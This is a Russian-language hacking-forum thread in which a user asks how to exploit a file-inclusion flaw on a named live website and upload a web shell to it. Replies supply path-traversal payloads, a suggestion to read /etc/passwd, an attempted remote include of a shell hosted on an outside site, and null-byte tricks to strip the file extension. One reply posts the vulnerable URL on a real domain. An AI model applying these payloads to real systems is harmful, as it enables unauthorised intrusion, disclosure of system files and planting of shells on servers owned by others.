• XSS.stack #1 – первый литературный журнал от юзеров форума

(include_path='') Help!

s3po

(L2) cache
Пользователь
Регистрация
23.02.2005
Сообщения
480
Реакции
7
Люди что мне дальше делать если исходить от ?page=ls -la он выдает об ошибке
в /home/comchoic/public_html/index.php
Warning: Failed opening './pages/ls -la.php' for inclusion (include_path='') in /home/comchoic/public_html/index.php on line 35
Вот польный текст что я вижу.
И подскажите как залить туда шелл.
 
Код:
?page=ls -la
Команда не выполняется. Он пытается приинклюдить фаил.

/pages/ls -la.php

Поробуй прочитать фаил так:

Код:
?page=/../index
Если выведет сорс - ты удачно зашел)
 
Так вот я и говорю погдяди в код пари попробуй. Бывает ничо не отображается а в коде что надо.
Или попробуй посмотреть другой фаил. например найти ect/passwd
 
хрен че получиться он инклудит файлы из папки /pages/
потому и вылетает ошибка


Warning: Failed opening './pages/http://zlo.narod.ru/sh.php' for inclusion (include_path='') in /home/comchoic/public_html/index.php on line 35

инклюдить можно только локальные файлы ито с расширением php
 
А в конце разве нельзя '\0' поставить, че бы расширение отбросить...
 
попробовать можно, но все равно иклюдятся файлы только из папки ./pages поэтому внешний инклуд отпадает
 
я же говорю внешний инклуд отпадает
внетренний работает, но так как инклудятся файлы только с расширением php то приинклудить .htaccess или /etc/passwd не получиться
 
если на сервере включены "магические кавычки", то нуль-байт фильтруется. Но расширение все еще можно попробовать отбросить ;)
 
Ржал долго:
_http://www.commuterchoice.com/index.php?page=/../index
:D

Нуль баг фильтруется...

Составителю темы: s3po
А ls -la надо писать, когда скрипт юзает переменную, которую потом сунет в passthru(); или system(); :crazy:

void offtop()
{
Кстати, кто меня помнит. Я собираюсь возвращаться в андер =) Все-таки гамы трофируют мозги =)
}
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх